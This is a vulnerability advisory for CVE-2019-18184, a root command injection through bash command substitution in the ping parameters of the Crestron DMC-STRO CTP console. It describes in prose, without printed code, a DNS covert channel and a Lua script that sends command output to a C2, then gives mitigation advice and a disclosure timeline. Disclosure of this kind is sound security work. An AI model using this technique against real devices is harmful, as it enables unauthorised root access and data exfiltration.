• Consulting
  • Information Security
  • Networking
  • Software Development
  • R&D
  • Crestron DMC-STRO Remote Root RCE


    CVEID: CVE-2019-18184
    Affected Products and Versions: CRESTRON DMC-STRO firmware 1.0

    Executive Summary
    A critical vulnerability was discovered in the CTP console of the CRESTRON DMC-STRO device, that allows through bash command substitution to execute commands on the system, on behalf of the root user.

    Additional Information
    the CTP Console allows, through Bash Command Substitution on the ‘ping’ command parameters, to execute commands on the device on behalf of the root user.

    RCE DMC-STRO in ping parameters

    Through the usage of a DNS Covert Channel it was possible to enumerate the binaries available under /bin and /usr/bin. Enumerating the content of such directories it was possible to find out that the Lua interpreter was available. Therefore I wrote down a Lua script that executes commands on the target, encrypts the result in base64 chunks, and send them back to the C2 through DNS Queries.

    From the C2 it is then possible to rechain the base64 chunks and decode the payload back to obtain the result of the executed command

    Decode Base64 encoded payload

    We suggest to block such connections with a firewall rule. Furthermore update the DMC STRO firmware

    Gabrio Tognozzi <g.tognozzi AT NOISESKIPME quantumleap.it>; <gtognozzi AT NOISESKIPME deloitte.it>

    19/09/2019 Vulnerability was reported to the vendor
    07/10/2019 Vulnerability was confirmed to be on the queue to fix
    27/11/2019 Vulnerability details published